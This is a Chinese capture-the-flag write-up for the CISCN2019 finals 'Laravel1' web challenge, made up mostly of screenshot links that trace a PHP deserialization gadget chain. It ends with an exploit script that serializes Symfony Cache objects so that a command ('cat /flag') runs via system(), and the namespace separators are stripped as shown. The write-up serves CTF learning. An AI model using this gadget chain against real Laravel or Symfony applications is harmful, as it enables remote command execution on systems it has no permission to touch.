![[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/0-1650878932.gif "[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解")
![[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/7-1650878935.png "[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解")
界面如上,比较单一:
指出了反序列化的点:还有备份文件。
下面反序列化的入口:
![[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/10-1650878937.png "[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解")
就当找到了吧:
![[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/3-1650878939.png "[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解")
确实可以跳转:
![[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/3-1650878941.png "[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解")
可控:
![[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/6-1650878943.png "[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解")
寻找这个类,看是否被调用:
![[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/0-1650878946.png "[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解")
![[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/10-1650878948.png "[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解")
开始寻找使用了saveDeferred类的:
看别人的WP这个是唯一可以使用的:
![[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/6-1650878950.png "[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解")
调用了本类的initialise方法,但前文并没有定义,据其他WP说是会去父类找,
偷一张其继承关系的图:
![[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/10-1650878952.png "[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解")
查询得到其主要父类,尝试全局搜索initialise()
![[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/8-1650878954.png "[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解")
include可以使用:
![[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/5-1650878956.png "[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解")
那么在之前的那个PhpArrayAdapter.php中定义好$this->file,只要其存在就能包含出来:
贴exp:
namespace SymfonyComponentCacheAdapter;class TagAwareAdapter{public $deferred = array();function __construct($x){$this->pool = $x;}}class ProxyAdapter{protected $setInnerItem = 'system';}namespace SymfonyComponentCache;class CacheItem{protected $innerItem = 'cat /flag';}$a = new SymfonyComponentCacheAdapterTagAwareAdapter(new SymfonyComponentCacheAdapterProxyAdapter());$a->deferred = array('aa'=>new SymfonyComponentCacheCacheItem);echo urlencode(serialize($a));
使用:
还有问题未解决,等待了解:理解的太浅显了:
![[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/6-1650878958.jpeg "[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解")
原文来自CSDN博主「F1gh4」|侵删
![[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/2-1650878959.png "[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解")
![[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/9-1650878960.png "[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解")
![[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/4-1650878961.png "[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解")
![[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/3-1650878963.png "[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解")
。想加入我们就给我们留言吧![[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/4-1650878964.png "[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解")
。![[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/5-1650878966.gif "[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解")
![[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/1-1650878967.gif "[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解")
![[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/9-1650878969.png "[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解")
原文始发于微信公众号(寰宇卫士):[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论